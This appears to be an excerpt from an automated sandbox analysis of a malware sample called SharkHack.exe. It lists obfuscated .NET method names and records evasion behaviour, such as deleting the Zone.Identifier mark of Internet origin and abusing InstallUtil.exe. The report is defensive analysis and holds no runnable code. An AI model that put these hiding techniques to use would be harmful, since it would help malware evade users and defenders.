                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, DVe77uArnwnNDQv3Dbl.csHigh entropy of concatenated method names: 'BdoAuXcNyQ', 'sbYAyWySxj', 'RkYA34EEpW', 'IMQQgai4HEgK1Fgd6ict', 'GoPTa3i4qipsqQfMZ9yx', 'xenTsWi4nVRMnJSnr8lm', 'urpAflrHeT', 'PeRAof6LJe', 'uHeQqNi4P9NQqL5xspvZ', 'MncRqii44PvKVecdRfNw'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, agSmQGA6x8YKfIQZYUp.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'uLJigAm668E', 'emDiFi8Sspd', 'ncBawSi4r78xPuXP857Y', 'KIuUkIi4YFvxDstVLyQR', 'daIEshi4hKQPS9QdQWr0', 'wDNqoni4kLWaBydrmwIf'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, bPe62WgY07dCC4gPiXE.csHigh entropy of concatenated method names: 'd2fgpQOWB6', 'vwSyCxiqVjHtUKlW7UW9', 'lBBWsCiqGBsxAxI7oKNa', 'dAyGTNiqes33YSA7Yo1m', 'Ql6CaQiqfelB3Mknc8h0', 'Xj6gkV3Aqk', 'r6a5cZiqYkuSybRuQaAm', 'q4ti3wiqhVuBqy8VAOjT', 'pImJvwiqksfAkO03akl0', 'RgYlN6iqsUB3eaSvj4DU'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xCU4oKgLJwFqTGxqALe.csHigh entropy of concatenated method names: 'WajgXCOYMc', 'IhU4i8iqzWWhVtKQVd6A', 'BTYafhiqmcBE2gdhsklL', 'GBn7YTiqCgXd6ugUTmEr', 'YMYbHFindPXSSOwRNCxU', 'sl0WgdiniVqHWAphT448', 'P9X', 'vmethod_0', 'PggiFuwnE7M', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, l2tJJiMnOtjjkuebrby.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'sV3ex6iaGpghvPguWQMr', 'W7gWWtiaD5nB6hPN9lfv', 'otvILPiaparygUU689XY'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EyYZxMzQJxf9HhxQVX.csHigh entropy of concatenated method names: 'fVjiiqAZ3I', 'ahPiWB98ge', 'En4iFpwGRO', 'dBciA37MDV', 'IWRi97MDn0', 'eNticQ6lY6', 'csPi6Pl1cD', 'GnbyEriu9vy9T1GSgwUA', 'pfnyumiuceCGTZBw2tYP', 'r9HXGLiugyUiFJC9bmpX'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, UXLx0DRf21RZHTP33Hg.csHigh entropy of concatenated method names: 'GSWRRDjcyV', 'fnWRNYf7TQ', 'Vl1RuskHFv', 'VkQRyTjOv6', 'VysR3f8YMA', 'O8tddWiZlfG4LlbiejiZ', 'jn4uHwiZM1Lck4f9bIn6', 'hTdOpNiZOY6hbwaXVVfB', 'qKikmciZQ0OK6AFIPUut', 'I3vIeeiZS72BXjCfNh2G'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, cmRE6fuWoqjFh1rfG4S.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'Dh8uA1TJGA', 'Write', 'nOpu9O2qJk', 'VWguclUjAg', 'Flush', 'vl7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eOnlQ4DIVobuujehJy8.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'm4Gig7ovubh', 'TGhiFL1Jfm5', 'vnQHFwiS7pRjTsrkh6EJ', 'Sn9Lp8iSKXPoCgpTYCTV', 'gOWmHtiSs7dhTNmJ3FjE', 'NCA0rRiSrIQmDORop8MB', 'Qv7QG4iSYC5QXDC4J1BH'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, wfHRURyCvBN9uMe08Zq.csHigh entropy of concatenated method names: 'a8E3dv4sxr', 'Ydp3ikKJtr', 'uEt3t7yO7s', 'hq03WKTNHO', 'zGm3FInf2q', 'ICN3AcpAqg', 'SoVv22i0Lxm98HA0Y3dw', 'FnbkbQi0jtYRZDEdEJGI', 'PisA2si0ZWYXXBNoaC4U', 'l6Nq5Di00NbEQgmZ4SMv'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xOXNLvtA6BvgJw9KH17.csHigh entropy of concatenated method names: 'PQdtchWSZQ', 'qVMtgFlUpP', 'GR3t6s3Qqd', 'FMFt29p8AZ', 'R1t78TiyUol8wQPA0nlL', 'oLEKFqiy6PGlflykFJ7u', 'leQmHDiy2614NMNugdnH', 'HnBEBOiyJxcAf2fTrOlB', 'HKokANiy7bk6hw68PJnN', 'IDnMlPiyKugYYIXf5rpI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Sj1QuemkrWd6ods55g5.csHigh entropy of concatenated method names: 'k3jm3lnSAg', 'obZmPBFwyZ', 'zHLm4Yif3b', 'ornmBOoKbh', 'PV0mHt5Ko4', 'ri6mqTQ8Zr', 'zQhmnbVMsp', 'lLwmMmDGeA', 'HUEmONQdQc', 'lYEmlpmyy1'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EvLC0Q6fDXC9d2NcO4o.csHigh entropy of concatenated method names: 'y3SIkriOfA2KxP9yaHuN', 'arfgFciOofuVSo0DV4eY', 'NWYiZbiOROCW9bNxAZHX', 'aWiKCUIsS0', 'EwieORiO3xCusB1DVtIB', 'ygdo6uiOuCx9hULq7qh7', 'ISh7HJiOy2HIhZtwrBAj', 'TquYKdiOPcX1Aj7gXqsg', 'DZfUSaiO4DBX8r6Zeb8V', 'xKqsiD8u3C'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Esh3jMt4FQd8EuEcSY6.csHigh entropy of concatenated method names: 'VGvtTFGjTO', 'cEKtbTyM3q', 'Xy9q4AiyHD7CLMRiAv2U', 'MF2cTwiyqJeP2krRrIlA', 'ookZbNiyn9RLtg47eWhc', 'CRTt0cUVay', 'JNexX6iyQo3L3NJyNow4', 'B9u0jOiySwt1C8cntHrX', 'L6e4J4iyOFVU8uXvPTil', 'qT5TUfiyl5h8KMiTPq8i'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, EBncGytpUf7ZoU29JqB.csHigh entropy of concatenated method names: 'wvNte76lp3', 'niMtVlqSSy', 'NmhRGfiyVrpkZyBArs5i', 'Up84u1iyGUMhqBXsusD3', 'NFLXdDiye01l8WgZYKpK', 'JJcgwCiyfCG0LZApkqVA', 'l5cBObiyoD2sb2TU2Av5', 'HDyOKUiyRkDhhc33Rbc5', 'FNDM1OiyNGjqiP33ORvJ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, UeWumTDlK933ofbG6jP.csHigh entropy of concatenated method names: 'gB9DLX5NQc', 'vLSD0KLgdO', 'htrD5rWuSP', 'sbplPXiSWXJu29LxVB5h', 'gTASKLiSiOSYqebOcccs', 'mLhsouiStfFFuKi4HrKM', 'oDjxBbiSFptQTSjZTGAj', 'OSuDSaGGl5', 'UeRDTmJQBI', 'IIgDb6JMCF'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, eVUBXyvd37EwvnNnQ3w.csHigh entropy of concatenated method names: 'CavvFG0FDl', 'pNkvAcYLae', 'a9pCrfixZT49uu9BFDBu', 'wdnQfBixbS19PQGc7ESs', 'I1jTKdixjHWGedalSfg1', 'cE88iqixLy9BPo0HNdJZ', 'eaMpc0ix0w8XESSGnrXk', 'P79vtVxsVD', 'trYP4uixl0SxlvZf0vYS', 'nIJxV3ixQYytgjNfWNg3'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, XIXVg9Q4KO9xqy9Xlbs.csHigh entropy of concatenated method names: 'tulQH6wJbp', 'N7rQqNpbhP', 'BfoQnQBTiZ', 'MI2QMYQ6lW', 'RtyQOOX1Vw', 'J2OQlQ4D6A', 'VcaQQKlZUR', 'GMlQS7HGxf', 'oBPQTQ2B4C', 'EfJQbgXCdI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, frDJOLlZoeZGEdrZ1X3.csHigh entropy of concatenated method names: 'XliigodMXAr', 'g2Zl0gXKQq', 'xUEl5YkAOK', 'vEll1leoOa', 'XaAKgdiIknsVbxCZthlQ', 'vFqF6SiID0CUrqC73OZj', 'irenp7iIpXSUSUpBaqG0', 'wev5NliIGT2VkybVCcSE', 'oivCBLiIexobAjtRJxlb', 'cQX62AiIVDVxa9ObPfr7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, KJh8exWND6ZcWOnXuQd.csHigh entropy of concatenated method names: 'RmUWbhpRRv', 'G1hWjdJwxO', 'c6RWZuUcWV', 'nSGE8ri3OFPsQ7NiPeL2', 'PFXMt5i3lWSCXkoPdUTx', 'I1tuExi3nspSDs7SJ772', 'LDt2BHi3MQ6Z8stu2KOR', 'kGcWy8WMmj', 'OgQW3msGEa', 'EHbWPdhG4d'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Pca9G84gUl1B5pJt88W.csHigh entropy of concatenated method names: 'fP642BYqwe', 'oDt4U3esgt', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'uGk4JxEYO8', 'method_2', 'uc7'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, YtOS3uAjHPjvm6LamqB.csHigh entropy of concatenated method names: 'D4OA19MnMb', 'Tgt40Hi4xk75sebcqV1K', 'l97pIpi4XyljXqYs0RTJ', 'quer0ei4v9fexOkMej5u', 'Y0m9Vni4mEFrf4u7OmrA', 'awViRQi4C2niTnAgF7PD', 'U1J', 'P9X', 'gB2iFrdx1H4', 'r8niFYKCt9g'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, dtCayJyaOGx5LEOmbnx.csHigh entropy of concatenated method names: 'hRpy87pyrI', 'rgLyXJNn9s', 'xrvyvZlRVY', 'kBbyx5RX3D', 'z9aymVHYtV', 'h430cVi0MT6GB8bp0Oax', 'e0M4URi0qse9OOyw5K9m', 'Y6054Ai0nZApwL0AwoES', 'DcE4iKi0O2QqbuAEyXFN', 'HY1BgKi0lF3JlOEUFCko'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, j2x2Sff2hRDpqR2f5OY.csHigh entropy of concatenated method names: 'bZef4EuTZo', 'RWyfJpZ60i', 'JjSf739fAQ', 'EXUfK9xQdm', 'YsdfsrIDJe', 'V3sfrKcJS1', 'x0QfYm0CRu', 'zlqfhQYeeN', 'xi9fkH9VTu', 'YvifD2lyvG'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, nbUq6oQvQdMCN2Hs7at.csHigh entropy of concatenated method names: 'Gc7QmrQD96', 'NDxQCEet1Q', 'lusQzVbVTA', 'NDKSdJaVcp', 'MrwSi66YFg', 'dytStV5WeX', 'DlcSWH8pOM', 'YpISFqi8LN', 'HF6SAahAIr', 'LFVS9hTlvS'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xH9QInGrC59cxP8qDW4.csHigh entropy of concatenated method names: 'ctAO1iibcuOOhCAKxCPQ', 'Dw8LkQibg00Z3KRF7owu', 'U11kqkibAmMmrhJZIvmM', 'nfY5ibib9KkgKwFVplie', 'method_0', 'method_1', 'rE0Ghwiuev', 'WRqGk09NyA', 'B8yGDr3jgp', 'W6IGpW2WgQ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, kmhB7lqwmHUwLGJmKu0.csHigh entropy of concatenated method names: 'CZDxByiE8077frUYJsAW', 'tBtXZPiEaWEUuowfrQZ7', 'jxGgg9iEI46V6499lLqe', 'SreqagUmRA', 'Mh9', 'method_0', 'r6qqIKuoZ3', 'FgVq8ZdeRF', 'oHCqXA0hs7', 'N2eqv9P9EL'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, hZYSeB4xUMHfeUYaw62.csHigh entropy of concatenated method names: 'U6u4CvfqOS', 'Inx4zFDjCM', 'zGDBdWb0RJ', 'bixBiavytf', 'kHQBtll121', 'bXDBWs5g1w', 'Rpx', 'method_4', 'f6W', 'uL1'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, O95YsE9qy1W69aUchol.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'Alwig2UkaYK', 'emDiFi8Sspd', 'UN9Q5IiBBJW23Kx38LRA', 'SCYp8tiBHgv2IeodXskq', 'iWbJGGiBq1UWJUeMpV5x'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, oMw4Viojjr8FPG6vReH.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 't3LoLsW6Xs', 'Irqo0KQ6xZ', 'Dispose', 'D31', 'wNK'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, HrqOLvcDQCbwN14G5yu.csHigh entropy of concatenated method names: 'Ericyj5b5T', 'PN7E2BiHyvq620MKAr0X', 'Bq5ZkPiH3QxMoE2s46eZ', 'VPGGxaiHN21wEqe10crR', 'IHm6uoiHufYvs8LaRGTu', 'kGBgpOiHPTLM3WXm9LCb', 'fdAcGvYvKy', 'zZwcexr3rj', 'Q1LcV0AnGu', 'JTAcftioV6'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, Xx42aTN4NyQdEJlZivE.csHigh entropy of concatenated method names: 'method_0', 'AEUNHx7mlM', 'NWqNqL01L2', 'uQ0NnuYY7u', 'dyVNMe95EV', 'I0dNOKm6gM', 'm2eNlB2Ekd', 'eWrFGfiL9HdiVh6EmYUH', 'o4bu93iLcCdgP9loVENc', 'jFHwN6iLgUQvBeJYRisc'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, pUIXWIqOCHR9wOxYaox.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LdyqQHoAU1', 'WmqqSZctKi', 'bxSqTeNP9V', 'Ajdqb9Rnyk', 'bYyqjOhkCi', 'IyLqZS3glN', 'yBmCQ4iEqUsv8exxUdaO'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, pS5VWSiIe7h1sjvCDva.csHigh entropy of concatenated method names: 'P9X', 'z03iXI6LFe', 'ABNigd3qUPs', 'imethod_0', 'oVtivQfkKW', 'Oiph8diuwSj5qvdu1xK2', 'qhdcBaiuEEK1lEPOKOmC', 'KhF8UAiu55LjgvwngnW4', 'tYYfRyiu1CMZ4oQCYtwF', 'SqrceLiua0PGbxReinwt'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, qW8DReFRKfdEuJS2l55.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'ahkigWCtEhv', 'emDiFi8Sspd', 'pG1yGsiPDieYox0Eb89n', 'CyNlIuiPp9soMlbFryOv', 'Rk43HdiPGlqwUOA1V1yT'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, fZTkO09orwlYpJw0agv.csHigh entropy of concatenated method names: 'V4n94dxbnf', 'MJ1f15iByj46X11DKBYu', 'AnWq36iB33rm6YZMt0AJ', 'yN6UMpiBPCiAwpI9h0v4', 'E94', 'P9X', 'vmethod_0', 'nvGiFpRUWeJ', 'XBNig6v3YIG', 'imethod_0'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, xWrfjGe7y11IxF2Ve4q.csHigh entropy of concatenated method names: 'sVwfiZlqpO', 'joUd0WijsqNpjLtbZZuZ', 'IyVuL6ij7vpncKOPnJ1B', 'kaPhYeijKfOgRfKo8D6k', 'a3vesu7qaJ', 'uiuerihOxX', 'mISeYJ5Euj', 'OLJehU9yKl', 'aQgekVW6Ao', 'y0geDl3EkV'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, C0CLCEBGmfMtk1KjCNJ.csHigh entropy of concatenated method names: 'b2KHKLol5Z', 'DV89Zliwn6dSou575Og9', 'PQVUQbiwH3jHZ9JX5Qwa', 'w9BDwCiwqfxPFBItGCtj', 'TG6IA5iwMUymyG5Y1oZ7', 'kt5', 'qK6BViJVbu', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, ali708plKM6Ni0289eD.csHigh entropy of concatenated method names: 'N2N', 'HYTigsLWGKH', 'qKMpS0HIxi', 'RREigrLD9HM', 'nXKamkiTFKWS8B4BOMLX', 'hXP0LyiTAR68QUZq5h73', 'kBMBAHiTtqvUDdIl88SQ', 'LvusYXiTWSrAbUv9BOlE', 'zY6ZoeiT9v0mrVZwpFY2', 'xyRdffiTcGhcM471lY4V'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, vbJysBiKR1qvJiGrKqe.csHigh entropy of concatenated method names: 'pRBir33wN1', 'RoyiYrH1K6', 'R2Wiht9r4f', 'kl944xiuYB7TT1l5Inm8', 'PqXV1cius1YWmrOA7p7b', 'mqvUu0iurlLbT1HcsgM5', 'kyv6j7iuhuSX5vtcZ82L', 'KPF2ctiukq6aupc4PZPU', 'CdfZAPiuD4ZPEOjHMXqN'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, aiivD1jFb3ZoBVhwvH.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'NUbL9SjsI'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, avWVKRHwOK5QhelB7wy.csHigh entropy of concatenated method names: 'DQyHasOjw5', 'k6r', 'ueK', 'QH3', 'blfHIDWCe2', 'Flush', 'mxCH8Vielg', 'lOYHXXeK0U', 'Write', 'oTpHvKIfXZ'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, bjUD4qciiGm35ihtVho.csHigh entropy of concatenated method names: 'lqlcWgBqO2', 'FOAcFJ3uEm', 'A1bcAK34IE', 'pyUyeMiBX2jZNNoWl7eh', 'lNct3CiBvT30lAx0cwCN', 'NHTALFiBxln8KeaJZ4y4', 'KcUy90iBmHsdoDGLHTGM', 'h6EDLLiBCQ6UpG9pQLt8', 'COuvGniBzuCYUS2gaTE3', 'WiGUN0iHdpt8PpelCcST'
                          Source: 0.2.SharkHack.exe.4d6df08.2.raw.unpack, KBLMFH6KkAlYsgGtW00.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'LWMejdinRTJ496yh7B5U', 'vcQ8i2inN0XuciRBB1II', 'Y4KF5qinuvF4uav4o1jb', 'h1F6r791Tl'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Hides that the sample has been downloaded from the Internet (zone.identifier)
                          Source: C:\Users\user\Desktop\SharkHack.exeFile opened: C:\Users\user\Desktop\SharkHack.exe\:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe\:Zone.Identifier read attributes | deleteJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\SharkHack.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
